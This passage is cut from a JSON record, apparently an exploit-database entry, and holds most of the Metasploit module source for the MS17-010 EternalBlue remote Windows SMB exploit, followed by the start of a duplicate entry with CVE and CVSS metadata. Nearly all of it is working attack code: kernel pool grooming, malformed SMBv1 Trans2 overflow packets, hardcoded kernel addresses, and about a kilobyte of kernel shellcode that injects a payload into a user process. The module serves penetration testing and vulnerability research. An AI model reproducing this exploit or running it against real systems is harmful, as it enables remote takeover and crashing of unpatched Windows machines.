retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? 
and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS 
indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # 
STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning(\"The DCE/RPC service or probe may be blocked\") if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n 
gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. 
Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << 
\"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << 
\"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n 
packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n 
\"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n 
\"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n 
\"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. 
If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 1920}, "differentElements": ["published", "modified", "sourceData"], "edition": 43, "lastseen": "2018-06-04T19:48:49"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. 
This may be more likely with some payloads.", "enchantments": {"score": {"modified": "2018-04-14T18:18:58", "value": 5.8, "vector": "AV:L/AC:M/Au:M/C:C/I:N/A:C/"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-04-14T18:18:58", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will 